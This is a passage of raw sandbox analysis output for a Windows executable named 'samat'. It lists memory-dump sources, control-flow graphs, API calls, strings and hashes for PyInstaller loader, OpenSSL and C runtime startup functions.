                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                                                      • Instruction ID: 127545bfd5708d340e4017ced4b755c6033eac655890717380073fe0dae02455
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69A1D960A0FB47C1FE549B8DE85477822A0BF45BD5F580935CB0E4A7A0EF6CE496C718

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 724 7ff7e12c1950-7ff7e12c198b call 7ff7e12c45c0 727 7ff7e12c1991-7ff7e12c19d1 call 7ff7e12c7f90 724->727 728 7ff7e12c1c4e-7ff7e12c1c72 call 7ff7e12cc550 724->728 733 7ff7e12c19d7-7ff7e12c19e7 call 7ff7e12d06d4 727->733 734 7ff7e12c1c3b-7ff7e12c1c3e call 7ff7e12d004c 727->734 739 7ff7e12c19e9-7ff7e12c1a03 call 7ff7e12d4f08 call 7ff7e12c2910 733->739 740 7ff7e12c1a08-7ff7e12c1a24 call 7ff7e12d039c 733->740 738 7ff7e12c1c43-7ff7e12c1c4b 734->738 738->728 739->734 746 7ff7e12c1a26-7ff7e12c1a40 call 7ff7e12d4f08 call 7ff7e12c2910 740->746 747 7ff7e12c1a45-7ff7e12c1a5a call 7ff7e12d4f28 740->747 746->734 753 7ff7e12c1a5c-7ff7e12c1a76 call 7ff7e12d4f08 call 7ff7e12c2910 747->753 754 7ff7e12c1a7b-7ff7e12c1afc call 7ff7e12c1c80 * 2 call 7ff7e12d06d4 747->754 753->734 766 7ff7e12c1b01-7ff7e12c1b14 call 7ff7e12d4f44 754->766 769 7ff7e12c1b16-7ff7e12c1b30 call 7ff7e12d4f08 call 7ff7e12c2910 766->769 770 7ff7e12c1b35-7ff7e12c1b4e call 7ff7e12d039c 766->770 769->734 776 7ff7e12c1b50-7ff7e12c1b6a call 7ff7e12d4f08 call 7ff7e12c2910 770->776 777 7ff7e12c1b6f-7ff7e12c1b8b call 7ff7e12d0110 770->777 776->734 783 7ff7e12c1b9e-7ff7e12c1bac 777->783 784 7ff7e12c1b8d-7ff7e12c1b99 call 7ff7e12c2710 777->784 783->734 787 7ff7e12c1bb2-7ff7e12c1bb9 783->787 784->734 790 7ff7e12c1bc1-7ff7e12c1bc7 787->790 791 7ff7e12c1be0-7ff7e12c1bef 790->791 792 7ff7e12c1bc9-7ff7e12c1bd6 790->792 791->791 793 7ff7e12c1bf1-7ff7e12c1bfa 791->793 792->793 794 7ff7e12c1c0f 793->794 795 7ff7e12c1bfc-7ff7e12c1bff 793->795 797 7ff7e12c1c11-7ff7e12c1c24 794->797 795->794 796 7ff7e12c1c01-7ff7e12c1c04 795->796 796->794 800 7ff7e12c1c06-7ff7e12c1c09 796->800 798 7ff7e12c1c26 797->798 799 7ff7e12c1c2d-7ff7e12c1c39 797->799 798->799 799->734 799->790 800->794 801 7ff7e12c1c0b-7ff7e12c1c0d 800->801 801->797
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C7F90: _fread_nolock.LIBCMT ref: 00007FF7E12C803A
                                                                                                                                                                                                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7E12C1A1B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                                      • Opcode ID: da661dafef7a958cffc458f9031f094bed4044546fae98e38e9c6353f513da79
                                                                                                                                                                                                                                                                                      • Instruction ID: 099d9a3fd213d9c3470f2c5f8372f798258e2db17362bb36acf9110826a5232a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da661dafef7a958cffc458f9031f094bed4044546fae98e38e9c6353f513da79
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46819171B08682C6EB11EB14D8433F9A398AF48784FC08433EA8D87795DEBCE545D762

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 802 7ff8b838ecc0-7ff8b838ecf1 call 7ff8b8331325 805 7ff8b838ed01-7ff8b838ed59 802->805 806 7ff8b838ecf3-7ff8b838ecfa 802->806 807 7ff8b838ed68-7ff8b838ed6c 805->807 808 7ff8b838ed5b-7ff8b838ed65 805->808 806->805 809 7ff8b838ed70-7ff8b838ed75 807->809 808->807 810 7ff8b838edb4-7ff8b838edca 809->810 811 7ff8b838ed77-7ff8b838ed7a 809->811 814 7ff8b838edd3 call 7ff8b8332252 810->814 815 7ff8b838edcc-7ff8b838edd1 call 7ff8b83326a8 810->815 812 7ff8b838ed80-7ff8b838ed83 811->812 813 7ff8b838ee94-7ff8b838eeaa 811->813 819 7ff8b838ef80-7ff8b838ef85 ERR_new 812->819 820 7ff8b838ed89-7ff8b838ed8c 812->820 817 7ff8b838eeb3 call 7ff8b83311c7 813->817 818 7ff8b838eeac-7ff8b838eeb1 call 7ff8b83315e1 813->818 822 7ff8b838edd8-7ff8b838edda 814->822 815->822 832 7ff8b838eeb8-7ff8b838eeba 817->832 818->832 823 7ff8b838ef8a-7ff8b838efa8 ERR_set_debug 819->823 831 7ff8b838ed92-7ff8b838ed98 820->831 827 7ff8b838ede0-7ff8b838ede3 822->827 828 7ff8b838f053 822->828 829 7ff8b838f048-7ff8b838f04e call 7ff8b8331d8e 823->829 835 7ff8b838ee01-7ff8b838ee0d 827->835 836 7ff8b838ede5-7ff8b838edf7 827->836 834 7ff8b838f055-7ff8b838f06c 828->834 829->828 831->807 837 7ff8b838ed9a-7ff8b838edaa 831->837 832->828 838 7ff8b838eec0-7ff8b838eed8 832->838 835->828 844 7ff8b838ee13-7ff8b838ee23 835->844 839 7ff8b838edf9 836->839 840 7ff8b838edfe 836->840 837->810 841 7ff8b838f011-7ff8b838f01b ERR_new 838->841 842 7ff8b838eede-7ff8b838ef04 838->842 839->840 840->835 841->823 846 7ff8b838eff6-7ff8b838effa 842->846 847 7ff8b838ef0a-7ff8b838ef0d 842->847 858 7ff8b838f020-7ff8b838f042 ERR_new ERR_set_debug 844->858 859 7ff8b838ee29-7ff8b838ee37 844->859 850 7ff8b838f002-7ff8b838f00c ERR_set_debug ERR_new 846->850 851 7ff8b838effc-7ff8b838f000 846->851 848 7ff8b838ef13-7ff8b838ef16 847->848 849 7ff8b838efd7-7ff8b838efe5 847->849 853 7ff8b838ef20-7ff8b838ef2e 848->853 854 7ff8b838ef18-7ff8b838ef1b 848->854 855 7ff8b838efe7-7ff8b838efea call 7ff8b8332540 849->855 856 7ff8b838efef-7ff8b838eff4 849->856 850->829 851->828 851->850 853->809 854->809 855->856 856->834 858->829 861 7ff8b838ee85-7ff8b838ee8d 859->861 862 7ff8b838ee39-7ff8b838ee3c 859->862 861->813 862->861 863 7ff8b838ee3e-7ff8b838ee5f BUF_MEM_grow_clean 862->863 864 7ff8b838ee65-7ff8b838ee68 863->864 865 7ff8b838efad-7ff8b838efd5 ERR_new ERR_set_debug 863->865 864->865 866 7ff8b838ee6e-7ff8b838ee83 864->866 865->829 866->861
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem.c$read_state_machine
                                                                                                                                                                                                                                                                                      • API String ID: 0-3323778802
                                                                                                                                                                                                                                                                                      • Opcode ID: c8972936501a879b7e84c5051af7770807ba9d65b882bacb7b5450dec163fd8f
                                                                                                                                                                                                                                                                                      • Instruction ID: 59bb07dead024b33a744ff808182936bbd85c3656d4cf010424ab90ef6fa5e68
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8972936501a879b7e84c5051af7770807ba9d65b882bacb7b5450dec163fd8f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9914972A0868686FB509B29D8503BD2790EB89B88F5C413ADB0D476D6CF7DE44BC748

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 867 7ff8b838f6b0-7ff8b838f6dc call 7ff8b8331325 870 7ff8b838f6ec-7ff8b838f73c 867->870 871 7ff8b838f6de-7ff8b838f6e5 867->871 872 7ff8b838f740-7ff8b838f745 870->872 871->870 873 7ff8b838f954-7ff8b838f957 872->873 874 7ff8b838f74b-7ff8b838f74e 872->874 877 7ff8b838f974-7ff8b838f97d 873->877 878 7ff8b838f959-7ff8b838f96b 873->878 875 7ff8b838f750-7ff8b838f753 874->875 876 7ff8b838f78a-7ff8b838f799 874->876 879 7ff8b838f759-7ff8b838f75c 875->879 880 7ff8b838f8ab-7ff8b838f8ba 875->880 895 7ff8b838f7b1-7ff8b838f7ce 876->895 896 7ff8b838f79b-7ff8b838f7a5 876->896 889 7ff8b838f983-7ff8b838f986 877->889 890 7ff8b838fa45-7ff8b838fa49 877->890 881 7ff8b838f972 878->881 882 7ff8b838f96d 878->882 883 7ff8b838f762-7ff8b838f785 ERR_new ERR_set_debug 879->883 884 7ff8b838f925-7ff8b838f92b call 7ff8b83910e2 879->884 885 7ff8b838f8ca-7ff8b838f8d0 880->885 886 7ff8b838f8bc-7ff8b838f8c0 880->886 881->877 882->881 891 7ff8b838fa74-7ff8b838fa7f call 7ff8b8331d8e 883->891 902 7ff8b838f92d-7ff8b838f933 884->902 893 7ff8b838f8d2-7ff8b838f8d5 885->893 894 7ff8b838f8ea-7ff8b838f901 885->894 886->885 892 7ff8b838f8c2-7ff8b838f8c5 call 7ff8b8331cf8 886->892 897 7ff8b838f998-7ff8b838f99f 889->897 898 7ff8b838f988-7ff8b838f98b 889->898 899 7ff8b838fa51-7ff8b838fa56 ERR_new 890->899 900 7ff8b838fa4b-7ff8b838fa4f 890->900 909 7ff8b838fa84 891->909 892->885 893->894 904 7ff8b838f8d7-7ff8b838f8e8 893->904 905 7ff8b838f903-7ff8b838f908 call 7ff8b8331294 894->905 906 7ff8b838f90a call 7ff8b8331528 894->906 895->909 918 7ff8b838f7d4-7ff8b838f7dc 895->918 896->895 916 7ff8b838f9ca-7ff8b838f9d8 call 7ff8b8331b9a 897->916 898->872 908 7ff8b838f991-7ff8b838f993 898->908 910 7ff8b838fa5b-7ff8b838fa6e ERR_set_debug 899->910 900->899 900->909 902->872 911 7ff8b838f939-7ff8b838f943 902->911 914 7ff8b838f90f-7ff8b838f911 904->914 905->914 906->914 915 7ff8b838fa86-7ff8b838fa9e 908->915 909->915 910->891 911->873 914->909 920 7ff8b838f917-7ff8b838f91e 914->920 927 7ff8b838f9e4-7ff8b838f9ee ERR_new 916->927 928 7ff8b838f9da-7ff8b838f9de 916->928 922 7ff8b838f7f1-7ff8b838f804 call 7ff8b8331389 918->922 923 7ff8b838f7de-7ff8b838f7ec 918->923 920->884 929 7ff8b838f80a-7ff8b838f82b 922->929 930 7ff8b838fa2c-7ff8b838fa3b call 7ff8b8331b9a ERR_new 922->930 923->872 927->910 928->909 928->927 929->930 934 7ff8b838f831-7ff8b838f83c 929->934 930->890 935 7ff8b838f872-7ff8b838f893 934->935 936 7ff8b838f83e-7ff8b838f84a 934->936 940 7ff8b838fa13-7ff8b838fa22 call 7ff8b8331b9a ERR_new 935->940 941 7ff8b838f899-7ff8b838f8a5 call 7ff8b8331140 935->941 936->916 939 7ff8b838f850-7ff8b838f853 936->939 939->935 943 7ff8b838f855-7ff8b838f86d call 7ff8b8331b9a 939->943 940->930 941->880 941->940 943->872
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ERR_new.LIBCRYPTO-3(?,?,FFFFFFFF,00000000,00007FF8B838F416), ref: 00007FF8B838F762
                                                                                                                                                                                                                                                                                      • ERR_set_debug.LIBCRYPTO-3(?,?,FFFFFFFF,00000000,00007FF8B838F416), ref: 00007FF8B838F77A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem.c$write_state_machine
                                                                                                                                                                                                                                                                                      • API String ID: 193678381-552286378
                                                                                                                                                                                                                                                                                      • Opcode ID: e5d1fe94fccde403d4ccffd35c49600b4c13cc4e7178492653a3fc2a8d140b00
                                                                                                                                                                                                                                                                                      • Instruction ID: 6d4d2006c46abc650adff783cf34b2a914a2e3143a1c3cc9dd2115bf24e17170
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5d1fe94fccde403d4ccffd35c49600b4c13cc4e7178492653a3fc2a8d140b00
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6A14C32A08A4286EB649B2DD4547BD23A0FB48BC8F5C4136DB4D47696DF3ED947CB08

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                      • Opcode ID: 041c8b2bf8c5c3e51d5a3dfba2571142eaa5c99664a91f17fba29c235bc43b34
                                                                                                                                                                                                                                                                                      • Instruction ID: 1e45551eb6095946b4a5ee24d7cefa3ff41efbdd6b5f6c094339b1c74744a1b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 041c8b2bf8c5c3e51d5a3dfba2571142eaa5c99664a91f17fba29c235bc43b34
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB415D22B0854286EB11EB21AC023B9E398BB54784FD44833EE4D47A95DEBCE501D666

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1279 7ff8b7e8eca8-7ff8b7e8ecae 1280 7ff8b7e8ecb0-7ff8b7e8ecb3 1279->1280 1281 7ff8b7e8ece9-7ff8b7e8ecf3 1279->1281 1283 7ff8b7e8ecb5-7ff8b7e8ecb8 1280->1283 1284 7ff8b7e8ecdd-7ff8b7e8ed1c call 7ff8b7e8f7d0 1280->1284 1282 7ff8b7e8ee10-7ff8b7e8ee25 1281->1282 1285 7ff8b7e8ee34-7ff8b7e8ee4e call 7ff8b7e8f664 1282->1285 1286 7ff8b7e8ee27 1282->1286 1288 7ff8b7e8ecd0 __scrt_dllmain_crt_thread_attach 1283->1288 1289 7ff8b7e8ecba-7ff8b7e8ecbd 1283->1289 1302 7ff8b7e8ed22-7ff8b7e8ed37 call 7ff8b7e8f664 1284->1302 1303 7ff8b7e8edea 1284->1303 1300 7ff8b7e8ee50-7ff8b7e8ee85 call 7ff8b7e8f78c call 7ff8b7e8f590 call 7ff8b7e8fca8 call 7ff8b7e8f940 call 7ff8b7e8f964 call 7ff8b7e8f7bc 1285->1300 1301 7ff8b7e8ee87-7ff8b7e8eeb8 call 7ff8b7e8fa14 1285->1301 1290 7ff8b7e8ee29-7ff8b7e8ee33 1286->1290 1294 7ff8b7e8ecd5-7ff8b7e8ecdc 1288->1294 1291 7ff8b7e8ecc9-7ff8b7e8ecce call 7ff8b7e8f714 1289->1291 1292 7ff8b7e8ecbf-7ff8b7e8ecc8 1289->1292 1291->1294 1300->1290 1311 7ff8b7e8eec9-7ff8b7e8eecf 1301->1311 1312 7ff8b7e8eeba-7ff8b7e8eec0 1301->1312 1314 7ff8b7e8ee02-7ff8b7e8ee0f call 7ff8b7e8fa14 1302->1314 1315 7ff8b7e8ed3d-7ff8b7e8ed4e call 7ff8b7e8f6d4 1302->1315 1306 7ff8b7e8edec-7ff8b7e8ee01 1303->1306 1318 7ff8b7e8eed1-7ff8b7e8eedb 1311->1318 1319 7ff8b7e8ef16-7ff8b7e8ef1e call 7ff8b7e8de80 1311->1319 1312->1311 1316 7ff8b7e8eec2-7ff8b7e8eec4 1312->1316 1314->1282 1329 7ff8b7e8ed50-7ff8b7e8ed74 call 7ff8b7e8fc6c call 7ff8b7e8f580 call 7ff8b7e8f5a4 call 7ff8b7e9000a 1315->1329 1330 7ff8b7e8ed9f-7ff8b7e8eda9 call 7ff8b7e8f940 1315->1330 1324 7ff8b7e8efb7-7ff8b7e8efc4 1316->1324 1325 7ff8b7e8eee7-7ff8b7e8eef5 1318->1325 1326 7ff8b7e8eedd-7ff8b7e8eee5 1318->1326 1331 7ff8b7e8ef23-7ff8b7e8ef2c 1319->1331 1333 7ff8b7e8eefb-7ff8b7e8ef10 call 7ff8b7e8eca8 1325->1333 1344 7ff8b7e8efad-7ff8b7e8efb5 1325->1344 1326->1333 1329->1330 1379 7ff8b7e8ed76-7ff8b7e8ed7d __scrt_dllmain_after_initialize_c 1329->1379 1330->1303 1349 7ff8b7e8edab-7ff8b7e8edb7 call 7ff8b7e8fa04 1330->1349 1334 7ff8b7e8ef64-7ff8b7e8ef66 1331->1334 1335 7ff8b7e8ef2e-7ff8b7e8ef30 1331->1335 1333->1319 1333->1344 1346 7ff8b7e8ef68-7ff8b7e8ef6b 1334->1346 1347 7ff8b7e8ef6d-7ff8b7e8ef82 call 7ff8b7e8eca8 1334->1347 1335->1334 1343 7ff8b7e8ef32-7ff8b7e8ef54 call 7ff8b7e8de80 call 7ff8b7e8ee10 1335->1343 1343->1334 1373 7ff8b7e8ef56-7ff8b7e8ef5b 1343->1373 1344->1324 1346->1344 1346->1347 1347->1344 1361 7ff8b7e8ef84-7ff8b7e8ef8e 1347->1361 1368 7ff8b7e8edb9-7ff8b7e8edc3 call 7ff8b7e8f8a8 1349->1368 1369 7ff8b7e8eddd-7ff8b7e8ede8 1349->1369 1366 7ff8b7e8ef90-7ff8b7e8ef97 1361->1366 1367 7ff8b7e8ef99-7ff8b7e8efa9 1361->1367 1366->1344 1367->1344 1368->1369 1378 7ff8b7e8edc5-7ff8b7e8edd3 1368->1378 1369->1306 1373->1334 1378->1369 1379->1330 1380 7ff8b7e8ed7f-7ff8b7e8ed9c call 7ff8b7e90004 1379->1380 1380->1330
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 349153199-0
                                                                                                                                                                                                                                                                                      • Opcode ID: deb1322ace880252273496c75106878e47c311885b03c3f26c29ac77a371df4f
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b0ef4d196e666aea3233456ab45f4062a586b01c0aaaad3f83dfdf9e98be63b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: deb1322ace880252273496c75106878e47c311885b03c3f26c29ac77a371df4f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42817C61E187438AFB50AB6DA4412BD26A1AF85FC0F944135EB0C9B7B7EE3DE8558700

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
